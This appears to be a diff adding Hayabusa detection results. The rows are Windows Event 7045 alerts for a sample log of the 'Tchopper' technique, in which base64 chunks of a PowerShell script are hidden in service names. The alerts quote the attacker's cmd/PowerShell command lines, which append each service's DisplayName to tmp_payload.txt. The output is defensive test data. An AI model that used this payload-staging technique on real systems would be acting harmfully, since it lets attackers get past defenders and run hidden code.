+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:22.040 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEF2Z0V2ZW50c1BlclNlY29uZCA9ICRUb3RhbExvZ0V2ZW50cyAvICRUb3RhbFRpbWUgICAgICAgDQogICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAgJEF2Z0V2ZW50c1BlclNlY29uZC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:23.478 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9IFttYXRoXTo6Um91bmQoJEF2Z0V2ZW50c1BlclNlY29uZCwgNSkgDQogICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgfQ0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:24.954 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJTdGFydFRpbWUiLCAkT2xkZXN0RXZlbnRUaW1lKQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
